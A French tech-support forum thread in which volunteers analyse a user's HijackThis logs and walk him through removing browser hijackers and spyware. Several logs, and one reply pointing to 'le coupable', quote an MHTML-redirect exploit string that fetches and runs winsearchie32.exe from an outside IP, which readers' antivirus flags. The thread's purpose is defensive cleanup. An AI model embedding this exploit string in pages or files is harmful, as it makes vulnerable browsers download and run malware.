Rapport Hitjack

Recherche :

Mot : Pseudo : Filtrer
Bas de page
Auteur	Sujet : Rapport Hitjack

Pasan

Merci de m'aider.....

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\WINNT\Explorer.EXE
C:\PROGRA~1\SPEEDD~1\nopdb.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\SOUNDMAN.EXE
C:\PROGRA~1\WANADOO\CnxMon.exe
C:\PROGRA~1\WANADOO\taskbaricon.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\PROGRA~1\MESSAG~1\StartMessager.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\Program Files\WinTV\Ir.exe
C:\Program Files\Norton Utilities\SYSDOC32.EXE
C:\PROGRA~1\WANADOO\EspaceWanadoo.exe
C:\PROGRA~1\WANADOO\ComComp.exe
C:\PROGRA~1\WANADOO\Watch.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Pasan1\Local Settings\Temp\Répertoire temporaire 2 pour hjt.zip\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {2DB337DA-8231-43F8-AB27-91ABA104E389} - C:\WINNT\System32\mde.dll
O2 - BHO: (no name) - {549B5CA7-4A86-11D7-A4DF-000874180BB3} - (no file)
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - Startup: PowerReg SchedulerV2.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab
O16 - DPF: {11010101-1001-1111-1000-110112345678} - ms-its:mhtml:file://c:\nosuch.mht!http://69.50.179.52/winsearchie32.chm:winsearchie32.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{DA621077-9973-4250-BBE7-0958E44BD96F}: NameServer = 80.10.246.134 80.10.246.7
O18 - Protocol: cdefs - {B5F329B4-2BBD-48F5-ADAF-9EAF2AFE37B3} - (no file)
O18 - Filter: text/html - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll
O18 - Filter: text/plain - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll

Publicité

acrobaze

--------------------------1

Télécharge CoolWebSchredder sur:

http://www.lurkhere.com/~nicefiles/index.html
Laisse-le en attente sur ton bureau.

Munis-toi de la dernière version d'AdAware SE sur:
http://lavasoft.element5.com/french/support/download/
Pack français sur:
http://www.webmatze.tk/
télécharger->installer, mettre à jour, laisser en attente.

-----------------------------2

Redémarre en mode sans échec (en tapotant F8 au démarrage)

Lance HijackThis.

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
O2 - BHO: (no name) - {2DB337DA-8231-43F8-AB27-91ABA104E389} - C:\WINNT\System32\mde.dll
O2 - BHO: (no name) - {549B5CA7-4A86-11D7-A4DF-000874180BB3} - (no file)
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O16 - DPF: {11010101-1001-1111-1000-110112345678} - ms-its:mhtml:file://c:\nosuch.mht!http://69.50.179.52/winsearchie32.chm:winsearchie32.exe
O18 - Protocol: cdefs - {B5F329B4-2BBD-48F5-ADAF-9EAF2AFE37B3} - (no file)
O18 - Filter: text/html - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll
O18 - Filter: text/plain - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll

Coche ces lignes et clique "Fix checked".

Toujours en mode sans échec:
-Lance CoolWebSchredder.
-Lance une analyse complète Ad-Aware SE. Sélectionne et supprime tt ce qu'il trouvera.

--------------------------------3

Redémarre en mode normal. Poste un nouvel HijackThis.

minipouss

un mini mini

ne pas oublier O4 - Startup: PowerReg SchedulerV2.exe

http://www.pestpatrol.com/pestinfo [...] eduler.asp

Pasan

Merci Acrobaze
Merci Minipouss

Le nouvel HIJACKTHIS :

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\PROGRA~1\SPEEDD~1\nopdb.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\Explorer.EXE
C:\WINNT\SOUNDMAN.EXE
C:\PROGRA~1\WANADOO\CnxMon.exe
C:\PROGRA~1\WANADOO\taskbaricon.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\PROGRA~1\MESSAG~1\StartMessager.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\Program Files\WinTV\Ir.exe
C:\Program Files\Norton Utilities\SYSDOC32.EXE
C:\DOCUME~1\Pasan1\LOCALS~1\Temp\Rar$EX00.937\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - HKLM\..\RunServices: [SchedulingAgent] C:\WINNT\System32\mstask.exe
O4 - Startup: PowerReg SchedulerV2.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab

Merci d'avance...

minipouss

un mini mini

O4 - Startup: PowerReg SchedulerV2.exe est toujours là pour le virer regarde le lien que je t'ai donné vers pestpatrol où ils expliquent ce qu'il faut faire. Si l'anglais te gêne dis le et je t'aide

sasquash

pourquoi mon antivirus se declenche qd je vais sur ce post ? :??:

---------------
A 50 ans, si tu n'as mal absolument nul part c'est que t'es mort.

minipouss

un mini mini

:heink: il te dit quoi?

iorek2

Moi aussi et il me dit cheval de troie Exploit-MhtRedir.gen :??:

minipouss

un mini mini

c'est quoi vos antivirus?

iorek2

Viruscan entreprise 7.00 de Mcaffe

Publicité

sasquash

Viruscan entreprise 7.1 de Mcaffe

---------------
A 50 ans, si tu n'as mal absolument nul part c'est que t'es mort.

minipouss

un mini mini

ok j'ai demandé la vérification par d'autres personnes dans le topic modo

piouPiouM

insomniak

Hu :hebe:
Sous IE (ben ouais sous firefox,la faille n'est pas exploitable :sol: ), j'ai une alerte reconnu en tant que Exploit-MhtRedir.gen
Viruscan v4.5.1

piouPiouM a écrit :

le coupable :

O16 - DPF: {11010101-1001-1111-1000-110112345678} - ms-its:mhtml:file://c:\nosuch.mht!http://69.50.179.52/winsearchie32.chm::/winsearchie32.exe

Message édité par piouPiouM le 06-09-2004 à 18:34:56

---------------
o(^_^o) Gimp4you : tutoriels pour Gimp 2 | Galerie (o^_^)o

acrobaze

Donc, coche et fixe cette ligne:
O4 - Startup: PowerReg SchedulerV2.exe

Utilises-tu \HeavyWeather?

Pasan

Excuse Acrobaze, mais j'utilise une carte Tuner Hauppauge avec l'appli. Scheduler.

Dois je virer la ligne quand meme?

acrobaze

Oki. Regarde le lien donné par Minipouss:
http://www.pestpatrol.com/pestinfo [...] eduler.asp

Il y a bien:
profilepath+\start menu\programs\startup\powerreg schedulerv2.exe

Pour en être certain, recherche ce fichier powerreg schedulerv2.exe et vois s'il est lié vraiment à ta carte.

Message édité par acrobaze le 06-09-2004 à 21:34:55

minipouss

un mini mini

cette appli d'après ce qui est dit sur le web est un spyware réputé et répandu. Alors tu fais comme tu veux.

edit : grilled en tout cas aucune page web avec power scheduler et Hauppauge

Message édité par minipouss le 06-09-2004 à 21:38:13

iorek2

Je viens de faire un test avec FireFox et je n'ai plus le problème. :bounce: :sol:
Merci qui ??? Merci crosoft :pfff: :kaola:

Pasan

Merci de m'aider pour ce rapport...

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - HKCU\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab

acrobaze

Là, il n'y a rien de néfaste. Mais le rapport n'est pas entier.

One angel alone

O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab

acrobaze

Ce n'est pas la peine.
- HijackThis bug parfois (he oui...) sur les O9, indiquant un fichier manquant, alors qu'il est présent. Donc, si le fichier n'est pas néfaste, autant s'abstenir de fixer la ligne.
- Pourquoi ces O16?
fdjeux.net et static.ir.dgi.minefi.gouv.fr sont des sites pirates?

Pasan

Acrobaze a écrit :

Là, il n'y a rien de néfaste. Mais le rapport n'est pas entier.

Ok Merci Acrobaze...

Heu.... J'ai oublié quoi???

acrobaze

Tout le haut du rapport.
C'est important car il y a des processus non lancés par des lignes 04.

Pasan

Voila...

Logfile of HijackThis v1.98.2
Scan saved at 22:07:17, on 08/10/2004
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\WINNT\System32\svchost.exe
C:\WINNT\SOUNDMAN.EXE
C:\PROGRA~1\WANADOO\CnxMon.exe
C:\PROGRA~1\WANADOO\taskbaricon.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\PROGRA~1\MESSAG~1\StartMessager.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\Program Files\WinTV\Ir.exe
C:\Program Files\Norton Utilities\SYSDOC32.EXE
C:\PROGRA~1\WANADOO\EspaceWanadoo.exe
C:\PROGRA~1\WANADOO\ComComp.exe
C:\PROGRA~1\WANADOO\Watch.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\DOCUME~1\Pasan1\LOCALS~1\Temp\Rar$EX00.938\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.wanadoo.fr/go/page_recherche/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.wanadoo.fr
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - HKCU\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{DA621077-9973-4250-BBE7-0958E44BD96F}: NameServer = 80.10.246.134 80.10.246.7

D'avance Merci Acrobaze....

acrobaze

RAS! C'est bon! :hello:

Pasan

Acrobaze a écrit :

RAS! C'est bon! :hello:

Merci Acrobaze!!

Mais... si je peux me permettre, quelles bases as tu pour l'analyse de ces rapports ?

sanpellegrino

Sa connaissance ultime et universelle de tout ce qui touche de près ou de loin à la sécurité, aux spywares. En fait Acrobaze est celui qui a inventé l'analyse de logs, c'est un bot intelligent qui répond toujours juste :sarcastic: !

Acrobaze, voilà un exemple flagrant de quelqu'un qui veut apprendre et à qui tu n'as apporté qu'une petite réponse de court terme. Ton manquement est évident !

Pasan > regarde dans ma signature

---------------
Got spyware ? | HFR HijackThis Tutorial

acrobaze

Pasan a écrit :

Merci Acrobaze!!

Mais... si je peux me permettre, quelles bases as tu pour l'analyse de ces rapports ?

Salut!
Je crois d'abord que la base indispensable, c'est l'expérience.
